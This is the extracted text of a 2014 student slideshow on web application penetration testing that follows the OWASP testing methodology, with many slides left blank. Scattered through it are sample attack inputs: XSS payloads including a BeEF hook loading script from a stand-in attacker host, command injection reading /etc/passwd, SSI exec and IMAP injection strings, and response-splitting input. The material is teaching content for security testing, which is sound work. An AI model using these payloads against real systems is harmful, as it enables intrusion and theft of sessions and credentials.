Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Web application vulnerability assessment


Published on

This is my college project presentation #April 2014.

Published in: Education
  • Hi Ravi, Just gone through your presentation and found it extremely useful for beginners into Application Security. Keep up the good work always. :)
    Are you sure you want to  Yes  No
    Your message goes here

Web application vulnerability assessment

  1. 1. o A penetration test is a method of evaluating the security of a computer system or network by simulating an attack. o A Web Application Penetration Test focuses only on evaluating the security of a web application. o The process involves an active analysis of the application for any weaknesses, technical flaws, or vulnerabilities. o Any security issues that are found will be presented to the system owner together with an assessment of their impact and often with a proposal for mitigation or a technical solution. 2
  2. 2. o What is a vulnerability? A vulnerability is a flaw or weakness in a system's design, implementation, or operation and management that could be exploited to violate the system's security policy. • A threat is a potential attack that, by exploiting a vulnerability, may harm the assets owned by an application (resources of value, such as the data in a database or in the file system). • A test is an action that tends to show a vulnerability in the application. And Vulnerability is everywhere !! 3
  3. 3. 4
  4. 4. The OWASP Web Application Penetration Testing method is based on the black box approach. The tester knows nothing or very little information about the application to be tested. The testing model consists of: o Tester: Who performs the testing activities o Tools and methodology: The core of this Testing Guide project o Application: The black box to test 5
  5. 5. The test is divided into 2 phases: 1. Passive mode 2. Active mode In the passive mode, the tester tries to understand the application's logic, and plays with the application. Tools can be used for information gathering. At the end of this phase, the tester should understand all the access points (gates) of the application 6
  6. 6. In this phase, the tester begins to test using the methodology. We have split the set of active tests in 12 sub-categories for a total of 91 controls: I. Information Gathering II. Configuration and Deploy Management Testing III. Identity Management Testing IV. Authentication Testing V. Authorization Testing VI. Session Management Testing VII. Data Validation Testing VIII. Error Handling IX. Cryptography X. Logging XI. Business Logic Testing XII. Client Side Testing 7
  7. 7. 8
  8. 8. 1. Conduct Search Engine Discovery and Reconnaissance for Information Leakage 2. Fingerprint Web Server 3. Review Webserver Metafiles for Information Leakage 4. Enumerate Applications on Webserver 5. Review Webpage Comments and Metadata for Information Leakage 6. Identify application entry points 7. Map execution paths through application 8. Fingerprint Web Application Framework 9. Fingerprint Web Application 10. Map Network and Application Architecture 9
  9. 9. Google Hacking Database 10
  10. 10. Using a search engine, search for: [1] Network diagrams and configurations [2] Archived posts and emails by administrators and other key staff [3] Logon procedures and username formats [4] User names and passwords [5] Error message content [6] Development, test, UAT and staging versions of the website Queries are put in several categories: Footholds Files containing usernames Sensitive Directories Web Server Detection Vulnerable Files Vulnerable Servers Error Messages Files containing juicy info Files containing passwords Sensitive Online Shopping Info 11
  11. 11. Web Application response 12
  12. 12. Knowing the version and type of a running web server allows testers to determine known vulnerabilities and the appropriate exploits to use during testing. 13
  13. 13. robots.txt file for Information Leakage of the web application's directory/folder path(s). 14
  14. 14. Testing for web application vulnerabilities is to find out which particular applications are hosted on a web server 15
  15. 15. Reverse-IP services 16
  16. 16. 17
  17. 17. Review webpage comments and metadata to better understand the application and to find any information leakage. 18
  18. 18. Step 1) Navigate to and Intercept that same request using BURP Suite and send request into Intruder. 19
  19. 19. Step 2) Go to "Position" tab and select "GET" and click on "ADD" button 20
  20. 20. Step 3) Go to "Payloads" tab and select "HTTP Verbs" in to the Payload Options category 21
  21. 21. Step 4) Select "Intruder" Menu and select "Start attack" option 22
  22. 22. Observe request and response 23
  23. 23. Response for OPTIONS method 24
  24. 24. 25
  25. 25. Request made process 26
  26. 26. 27
  27. 27. X-Power-by Contain Development language name and version 28
  28. 28. Cookie default name contain its framework Word press directory structure More different framework cookie name refer : Page 75-76 (Documentation) 29
  29. 29. Currently one of the best fingerprinting tools on the market. Included in a default Kali Linux build 30
  30. 30. This great tool works on the principle of static file checksum based version difference thus providing a very high quality of fingerprinting. Language: Python 31
  31. 31. Wapplyzer is a Firefox/Chrome plug-in 32
  32. 32. Web server fingerprinting is a critical task for the Penetration tester. Knowing the version and type of a running web server allows testers to determine known vulnerabilities and the appropriate exploits to use during testing. Nmap version detection offers a lot of advanced features that can help in determining services that are running on a given host, it obtains all data by connecting to open ports and interrogating them by using probes that the specific services understand. 33
  33. 33. • List all the possible administrative interfaces. • Determine if administrative interfaces are available from an internal network or are also available from the Internet. Firewall/IDS Identifier script 34
  34. 34. 1. Test Network/Infrastructure Configuration 2. Test Application Platform Configuration 3. Test File Extensions Handling for Sensitive Information 4. Backup and Unreferenced Files for Sensitive Information 5. Enumerate Infrastructure and Application Admin Interfaces 6. Test HTTP Methods 7. Test HTTP Strict Transport Security 8. Test RIA cross domain policy 35
  35. 35. Proper configuration management of the web server infrastructure is very important in order to preserve the security of the application itself. If elements such as the web server software, the back-end database servers, or the authentication servers are not properly reviewed and secured, they might introduce undesired risks or introduce new vulnerabilities that might compromise the application itself. 1. WebSEAL, also known as Tivoli Authentication Manager, is a reverse proxy from IBM which is part of the Tivoli framework. 2. There are some GUI-based administration tools for Apache (like NetLoony) but they are not in widespread use yet. 36
  36. 36. 1. Handle server errors (40x or 50x) with custom-made pages instead of with the default web server pages. 2. Logging information 3. Keep in mind that all users can read .NET Framework machine.config and root web.config files by default. 4. Only enable server modules (ISAPI extensions in the IIS case) that are needed for the application. 37
  37. 37. Many web servers and application servers provide, in a default installation, sample applications and files that are provided for the benefit of the developer and in order to test that the server is working properly right after installation. However, many default web server applications have been later known to be vulnerable. This was the case, for example, for CVE-1999- 0449 (Denial of Service in IIS when the Exair sample site had been installed), CAN-2002-1744 (Directory traversal vulnerability in CodeBrws.asp in Microsoft IIS 5.0), CAN-2002-1630 (Use of sendmail.jsp in Oracle 9iAS), or CAN-2003-1172 (Directory traversal in the view-source sample in Apache’s Cocoon). 38
  38. 38. 39
  39. 39. When each file stem is tested, Burp check for various different extensions, according to these settings. 40
  40. 40. While most of the files within a web server are directly handled by the server itself, it isn't uncommon to find unreferenced and/or forgotten files that can be used to obtain important information about either the infrastructure or the credentials. Same as above test but only for backup information 41
  41. 41. THC-HYDRA for brute force attack 1)Set target port number or Protocol 2)Add Username and Password list 42
  42. 42. 3)Start Attack after some time we able to get root user password 43
  43. 43. Refer Identify application entry point 44
  44. 44. The use of this header by web applications avoids must be checked to know if the following security issues could be produced: • Attackers sniffing the network traffic and accessing the information transferred through unencrypted channel. • Attackers exploiting a man in the middle attack because of the problem of accepting certificates that are not trusted. • Users who mistakenly entered an address in the browser putting HTTP instead of HTTPS, or users who click on a link in a web application which mistakenly indicated the http protocol. Strict-Transport-Security: max-age=60000; includeSubDomains HSTS Header 45
  45. 45. Rich Internet Applications (RIA) have adopted Adobe's crossdomain.xml policy files in order to allow for controlled cross domain access to data and service consumption using technologies such as Oracle Java, Silverlight, and Adobe Flash. 46
  46. 46. 1. Test Role Definitions 2. Test User Registration Process 3. Test Account Provisioning Process 4. Testing for Account Enumeration and Guessable User Account 5. Testing for Weak or unenforced username policy 47
  47. 47. ROLE PERMISSION OBJECT CONSTRAINTS Administrator Read Customer records Manager Read Customer records Only records related to business unit Staff Read Customer records Only records associated with customers assigned by Manager Customer Read Customer record Only own record 48
  48. 48. 49
  49. 49. • Verify the identity requirements for user registration align with business/security requirements • Validate the registration process 50
  50. 50. 51
  51. 51. Verify which accounts may provision other accounts and of what type 52
  52. 52. CN000100 CN000101 …. R1001 – user 001 for REALM1 R2001 – user 001 for REALM2 53
  53. 53. User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed. 54
  54. 54. 1. Testing for Credentials Transported over an Encrypted Channel 2. Testing for default credentials 3. Testing for Weak lock out mechanism 4. Testing for bypassing authentication schema 5. Test remember password functionality 6. Testing for Browser cache weakness 7. Testing for Weak password policy 8. Testing for Weak security question/answer 9. Testing for weak password change or reset functionalities 10. Testing for Weaker authentication in alternative channel 55
  55. 55. SSLStrip 56
  56. 56. GET request send the credential 57
  57. 57. User Password Tester Tester Webmaster Webmaster Admin Admin123 System System Administrator admin …… ……. 58
  58. 58. Accounts are typically locked after 3 to 5 unsuccessful login attempts and can only be unlocked after a predetermined period of time, via a self-service unlock mechanism, or intervention by an administrator. 59
  59. 59. There are several methods to bypass the authentication schema in use by a web application:  Direct page request (forced browsing)  Parameter modification  Session ID prediction  SQL injection 60
  60. 60. 61
  61. 61. • Remember password functionality store your credential in cookie • You must check that credential is encrypted or not 62
  62. 62. Cache-Control: must-revalidate, pre-check=0, post-check=0, max-age=0, s-maxage=0 -------------------------------- HTTP/1.1: Cache-Control: no-cache ------------------------------- HTTP/1.0: Pragma: no-cache Expires: <past date or illegal value (e.g., 0)> 63
  63. 63. The most prevalent and most easily administered authentication mechanism is a static password. The password represents the keys to the kingdom, but is often subverted by users in the name of usability. In each of the recent high profile hacks that have revealed user credentials, it is lamented that most common passwords are still: 123456, password 64
  64. 64. Pre-generated questions: • The majority of pre-generated questions are fairly simplistic in nature and can lead to insecure answers. For example: • The answers may be known to family members or close friends of the user, e.g. "What is your mother's maiden name?", "What is your date of birth?" • The answers may be easily guessable, e.g. "What is your favorite color?", "What is your favorite baseball team?" • The answers may be brute forcible, e.g. "What is the first name of your favorite high school teacher?" - the answer is probably on some easily downloadable lists of popular first names, and therefore a simple brute force attack can be scripted. • The answers may be publicly discoverable, e.g. "What is your favorite movie?" - the answer may easily be found on the user's social media profile page. 65
  65. 65. In addition to the previous test it is important to verify: Is the old password requested to complete the change? The most insecure scenario here is if the application permits the change of the password without requesting the current password. Indeed if an attacker is able to take control of a valid session (s)he could easily change the victim's password. 66
  66. 66. In addition to the previous test it is important to verify: Is the old password requested to complete the change? The most insecure scenario here is if the application permits the change of the password without requesting the current password. Indeed if an attacker is able to take control of a valid session (s)he could easily change the victim's password. 67
  67. 67. 1. Testing Directory traversal/file include 2. Testing for bypassing authorization schema 3. Testing for Privilege Escalation 4. Testing for Insecure Direct Object References 68
  68. 68. 69
  69. 69.  Is it possible to access that resource even if the user is not authenticated?  Is it possible to access that resource after the log-out?  Is it possible to access functions and resources that should be accessible to a user that holds a different role/privilege? POST /admin/addUser.jsp HTTP/1.1 Host: [other HTTP headers] userID=fakeuser&role=3&group=grp001 70
  70. 70. ----------------------------------------------------------- POST /user/viewOrder.jsp HTTP/1.1 Host: …… groupID=grp001&orderID=0001 ------------------------------------------------------------- Verify if a user that does not belong to grp001 can modify the value of the parameters ‘groupID’ and ‘orderID’ to gain access to that privileged data. 71
  71. 71. HTTP/1.1 200 OK Server: Netscape-Enterprise/6.0 Date: Wed, 1 Apr 2006 13:51:20 GMT Set-Cookie: USER=aW78ryrGrTWs4MnOd32Fs51yDqp; path=/; Set-Cookie: SESSION=k+KmKeHXTgDi1J5fT7Zz; path=/; domain= Cache-Control: no-cache Pragma: No-cache Content-length: 247 Content-Type: text/html Expires: Thu, 01 Jan 1970 00:00:00 GMT Connection: close <form name="autoriz" method="POST" action = "visual.jsp"> <input type="hidden" name="profile" value="SysAdmin"> <body onload="document.forms.autoriz.submit()"> </td> </tr> 72
  72. 72. Insecure Direct Object References allow attackers to bypass authorization and access resources directly by modifying the value of a parameter used to directly point to an object. 73
  73. 73. 74
  74. 74. 1. Testing for Bypassing Session Management Schema 2. Testing for Cookies attributes 3. Testing for Session Fixation 4. Testing for Exposed Session Variables 5. Testing for Cross Site Request Forgery 6. Testing for logout functionality 7. Test Session Timeout 8. Testing for Session puzzling 75
  75. 75. If you have access to the session management schema implementation, you can check for the following: Random Session Token Token length Session Time-out Cookie configuration: o non-persistent: only RAM memory o secure (set only on HTTPS channel): Set Cookie: cookie=data; path=/;; secure o HTTPOnly (not readable by a script): Set Cookie: cookie=data; path=/;; HTTPOnly 76
  76. 76. 77
  77. 77. 78
  78. 78. Session ID before Login 79
  79. 79. Session ID After Login 80
  80. 80.  How are Session IDs transferred? e.g., GET, POST, Form Field (including hidden fields)  Are Session IDs always sent over encrypted transport by default?  Is it possible to manipulate the application to send Session IDs unencrypted? e.g., by changing HTTP to HTTPS?  What cache-control directives are applied to requests/responses passing Session IDs?  Are these directives always present? If not, where are the exceptions?  Are GET requests incorporating the Session ID used?  If POST is used, can it be interchanged with GET? 81
  81. 81. Request submission without any CSRF request token. A successful CSRF exploit can compromise end user data and operation, when it targets a normal user. If the targeted end user is the administrator account, a CSRF attack can compromise the entire web application. 82
  82. 82. Testing for logout user interface: Testing for server-side session termination Testing for session timeout Testing session clean at client side In this phase, we check that the application automatically logs out a user when that user has been idle for a certain amount of time, ensuring that it is not possible to “reuse” the same session and that no sensitive data remains stored in the browser cache. 83
  83. 83. This vulnerability occurs when an application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another. 84
  84. 84. 1. Testing for Reflected Cross Site Scripting 2. Testing for Stored Cross Site Scripting 3. Testing for HTTP Verb Tampering 4. Testing for HTTP Parameter pollution 5. Testing for SQL Injection 5.1 Oracle Testing 5.2 MySQL Testing 5.3 SQL Server Testing 5.4 Testing PostgreSQL 5.5 MS Access Testing 5.6 Testing for NoSQL injection ……….. 85
  85. 85. 6. Testing for LDAP Injection 7. Testing for ORM Injection 8. Testing for XML Injection 9. Testing for SSI Injection 10. Testing for XPath Injection 11. IMAP/SMTP Injection 12. Testing for Code Injection 12.1 Testing for Local File Inclusion 12.2 Testing for Remote File Inclusion 13. Testing for Command Injection 14. Testing for Buffer overflow 14.1 Testing for Heap overflow 14.2 Testing for Stack overflow 14.3 Testing for Format string 15. Testing for incubated vulnerabilities 16. Testing for HTTP Splitting/Smuggling 86
  86. 86. Reflected Cross-site Scripting (XSS) occur when an attacker injects browser executable code within a single HTTP response.<script>alert(123)</script> Bypass XSS filters Page#224 87
  87. 87."><script>alert(document.cookie)</script> 88
  88. 88. BeEF hook”><script src=http://attackersite/hook.js></script> 89
  89. 89. Step 1) Navigate to and Intercept that same request using BURP Suite and send request into Intruder. 90
  90. 90. Step 2) Go to "Position" tab and select "GET" and click on "ADD" button 91
  91. 91. Step 3) Go to "Payloads" tab and select "HTTP Verbs" in to the Payload Options category 92
  92. 92. Step 4) Select "Intruder" Menu and select "Start attack" option 93
  93. 93. Observe request and response 94
  94. 94. Web Application Server Backend Parsing Result Example ASP.NET / IIS concatenated with a comma color=red,blue ASP / IIS concatenated with a comma color=red,blue PHP / Apache Last occurrence only color=blue PHP / Zeus Last occurrence only color=blue JSP, Servlet / Apache Tomcat First occurrence only color=red JSP, Servlet / Oracle Application Server 10g First occurrence only color=red 95
  95. 95. Authentication bypass POST / HTTP/1.1 security_token=attackertoken&blogID=attackerblogidvalue& blogID=victimblogidvalue& acker email)&ok=Invite JSP, Servlet / Jetty First occurrence only color=red IBM Lotus Domino Last occurrence only color=blue IBM HTTP Server First occurrence only color=red mod_perl, libapreq2 / Apache First occurrence only color=red Perl CGI / Apache First occurrence only color=red mod_wsgi (Python) / Apache First occurrence only color=red Python / Zope All occurrences in List data type color=['red','blue'] 96
  96. 96. 97
  97. 97. 98
  98. 98. 99
  99. 99. 100
  100. 100. 101
  101. 101. 102
  102. 102. LDAP injection testing is similar to SQL Injection testing. The differences are that we use the LDAP protocol instead of SQL and that the target is an LDAP Server instead of a SQL Server. "(&(uid="+user+")(userPassword={MD5}"+base64(pack("H*",md5(pass)))+"))"; 103
  103. 103. An ORM is an Object Relational Mapping tool. It is used to expedite object oriented development within the data access layer of software applications, including web applications. for ORM Injection vulnerabilities is identical to SQL Injection testing (see Testing for SQL Injection). Orders.find_all "customer_id = 123 AND order_date = '#{@params['order_date']}'" Simply sending "' OR 1--" in the form where order date can be entered can yield positive results. 104
  104. 104. 105
  105. 105. Web servers usually give developers the ability to add small pieces of dynamic code inside static HTML pages, without having to deal with full-fledged server-side or client-side languages. This feature is incarnated by Server-Side Includes (SSI) Injection. 106
  106. 106. .shtml file Putting an SSI directive into a static HTML document is as easy as writing a piece of code like the following: -------------------------------------------------------- <!--#echo var="DATE_LOCAL" --> -------------------------------------------------------- to print out the current time. ----------------------------------------------------------------------- <!--#include virtual="/cgi-bin/" --> ----------------------------------------------------------------------- to include the output of a CGI script. ----------------------------------------------------------------- <!--#include virtual="/footer.html" --> ------------------------------------------------------------------- to include the content of a file or list files in a directory. ---------------------------------------------- <!--#exec cmd="ls" --> ---------------------------------------------- to include the output of a system command. 107
  107. 107. 108
  108. 108. FETCH 4791 BODY[HEADER] ---------------------------------------- In this scenario, the IMAP injection structure would be: --------------------------------------------------------------------------------- http://<webmail>/read_email.php?message_id=4791 BODY[HEADER]%0d%0aV100 CAPABILITY%0d%0aV101 FETCH 4791 -------------------------------------------------------------------------------- Which would generate the following commands: ------------------------------------------------- ???? FETCH 4791 BODY[HEADER] V100 CAPABILITY V101 FETCH 4791 BODY[HEADER] ------------------------------------------------------ where: ---------------------------------------------------------- Header = 4791 BODY[HEADER] Body = %0d%0aV100 CAPABILITY%0d%0a Footer = V101 FETCH 4791 ------------------------------------ Result Expected: Arbitrary IMAP/SMTP command injection 109
  109. 109. cs.jpg?&cmd=uname%20-a 110
  110. 110. 111
  111. 111. Testing for Local File Inclusion 112
  112. 112. 113
  113. 113. Testing for Remote File Inclusion 114
  114. 114. http://sensitive/cgi-bin/ http://sensitive/cgi-bin/ http://sensitive/something.php?dir=%3Bcat%20/etc/passwd 115
  115. 115. 116
  116. 116. 117
  117. 117. advanced%0d%0aContent- Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent- Type:%20text/html%0d%0aContent- Length:%2035%0d%0a%0d%0a<html>Sorry,%20System%20Down</htm l> -------------------------------------------------------------------------------- The resulting answer from the vulnerable application will therefore be the following: ----------------------------------------------------------- HTTP/1.1 302 Moved Temporarily Date: Sun, 03 Dec 2005 16:22:19 GMT Location: Content-Length: 0 HTTP/1.1 200 OK Content-Type: text/html Content-Length: 35 <html>Sorry,%20System%20Down</html> <other data> 118
  118. 118. 1. Analysis of Error Codes 2. Analysis of Stack Traces 119
  119. 119. 120
  120. 120. 121
  121. 121. 1. Testing for Weak SSL/TSL Ciphers, Insufficient Transport Layer Protection 2. Testing for Padding Oracle 3. Testing for Sensitive information sent via unencrypted channels 122
  122. 122. 123
  123. 123. 124
  124. 124. 125
  125. 125. 126
  126. 126. 1. Test time synchronisation 2. Test user-viewable log of authentication events 127
  127. 127. Date: Tue, 15 Oct 2013 14:11:09 GMT Server: Apache X-Frame-Options: Deny X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff Content-Language: en Vary: Accept-Encoding,Cookie Expires: Wed, 16 Oct 2013 14:11:09 GMT Cache-Control: max-age=86400 Content-Encoding: gzip Content-Type: text/html; charset=UTF-8 200 OK 128
  128. 128. 129
  129. 129. 1. Testing for DOM based Cross Site Scripting 2. Testing for JavaScript Execution 3. Testing for HTML Injection 4. Testing for Client Side URL Redirect 5. Testing for CSS Injection 6. Testing for Client Side Resource Manipulation 7. Test Cross Origin Resource Sharing 8. Testing for Cross Site Flashing 9. Testing for Clickjacking 10. Testing WebSockets 11. Test Web Messaging 12. Test Local Storage 130
  130. 130. 131
  131. 131. 132
  132. 132. 133
  133. 133. nin1.0&appctx=retUrl=xxxxx.xxxx/ 134
  134. 134.;-o-link:'javascript:alert(1)';-o-link-source:current; (Opera [8,12]);-:expression(alert(URL=1)); (IE 7/8) Resource Type Tag/Method Sink Frame iframe src Link a href AJAX Request, [url], true); URL CSS link href Image img src Object object data Script script src 135
  135. 135. HTTP/1.1 200 OK Date: Mon, 07 Oct 2013 18:57:53 GMT Server: Apache/2.2.22 (Debian) X-Powered-By: PHP/5.4.4-14+deb7u3 Access-Control-Allow-Origin: * Content-Length: 4 Keep-Alive: timeout=15, max=99 Connection: Keep-Alive Content-Type: application/xml [Response Body] 136
  136. 136. 137
  137. 137. 138
  138. 138. 139
  139. 139. 140
  140. 140. iframe1.contentWindow.postMessage(“Hello world”,””); 141
  141. 141. The Open Web Application Security Project (OWASP) is a 501(c)(3) worldwide not-for-profit charitable organization focused on improving the security of software. OWASP mission is to make software security visible, so that individuals and organizations worldwide can make informed decisions about true software security risks. 142
  142. 142. Net-Square Solutions Private Limited is a niche Information Security Service provider. Net-Square completely and mainly focused on technology based areas of information security like application & infrastructure security. Net-Square Solutions was founded by an internationally experienced Information security specialist Saumil Shah in the year 2000. Since then the Net-Square has conducted many assignments for some of the best Organizations in the World in sectors ranging from Banking & Financial Services to Telecom to Retail to Pharmaceuticals. 143
  143. 143. 144